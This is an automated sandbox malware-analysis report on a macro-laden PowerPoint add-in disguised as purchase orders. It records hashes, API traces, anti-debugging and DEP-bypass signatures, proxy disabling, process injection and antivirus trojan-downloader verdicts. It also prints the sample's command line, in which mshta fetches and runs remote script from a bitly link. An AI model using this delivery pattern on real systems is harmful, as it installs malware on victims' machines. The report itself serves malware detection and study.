popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Purchase orders with bank details.ppa

VBA_macro Generic Malware MSOffice File AntiDebug AntiVM
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6403_us Oct. 19, 2021, 5:10 p.m. Oct. 19, 2021, 5:13 p.m.
Size 62.0KB
Type Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Title: PowerPoint Presentation, Author: xxcdv, Last Saved By: junaid, Revision Number: 1, Name of Creating Application: Microsoft Office PowerPoint, Total Editing Time: 01:05, Create Time/Date: Mon Oct 18 02:57:03 2021, Last Saved Time/Date: Mon Oct 18 02:58:09 2021, Number of Words: 0
MD5 87b2f6337fbea5ee3f10eb1b210dd795
SHA256 8811a7bfc8b36649308ae32e37c3cfcd0e1bf700f34988bb9c7028a7d367d894
CRC32 AAC6B276
ssdeep 192:EKX63qOaEfhODL4k5yx2eyViSgXruCv8pT+GLFaMMQZxN4Z7LlVQw/Sf:K6gf8DL4SwpXrLv85+GRhMQvN4xJ/Sf
Yara
  • Contains_VBA_macro_code - Detect a MS Office document with embedded VBA macro code [binaries]
  • Generic_Malware_Zero - Generic Malware
  • Microsoft_Office_File_Zero - Microsoft Office File

Name Response Post-Analysis Lookup
www.bitly.com
A 67.199.248.15
A 67.199.248.14
CNAME bitly.com
67.199.248.14
IP Address Status Action
164.124.101.2 Active Moloch
67.199.248.15 Active Moloch

Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 1608
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6a96e000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1608
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04d55000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1608
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04d55000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1608
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 65536
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x35180000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1608
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 65536
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x35180000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1608
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75187000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1608
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75181000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1608
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 65536
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x35180000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1608
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75179000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1608
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 65536
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x35180000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1608
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75180000
process_handle: 0xffffffff
1 0 0
cmdline "mshta" https://www.bitly.com/ajdwwrufqwehjwijjd
cmdline "C:\Windows\System32\mshta.exe" https://www.bitly.com/ajdwwrufqwehjwijjd
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 1608
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x7ef80000
process_handle: 0xffffffff
1 0 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
Time & API Arguments Status Return Repeated

RegSetValueExA

 key_handle: 0x000002c4
regkey_r: ProxyEnable
reg_type: 4 (REG_DWORD)
value: 0
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
1 0 0
Lionic Trojan.Script.Generic.a!c
Symantec CL.Downloader!gen87
ESET-NOD32 VBA/TrojanDownloader.Agent.WVA
TrendMicro-HouseCall TROJ_FRS.VSNTJI21
Kaspersky HEUR:Trojan-Downloader.Script.Generic
NANO-Antivirus Trojan.Ole2.Vbs-heuristic.druvzi
McAfee-GW-Edition Artemis!Trojan
Ikarus Trojan.VBA.Agent
McAfee RDN/GenericU
Tencent Mac.Trojan.Macrov.Eckg
parent_process powerpnt.exe martian_process "mshta" https://www.bitly.com/ajdwwrufqwehjwijjd
parent_process powerpnt.exe martian_process "C:\Windows\System32\mshta.exe" https://www.bitly.com/ajdwwrufqwehjwijjd
Process injection Process 1608 resumed a thread in remote process 2620
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x0000055c
suspend_count: 1
process_identifier: 2620
1 0 0
file C:\Windows\System32\mshta.exe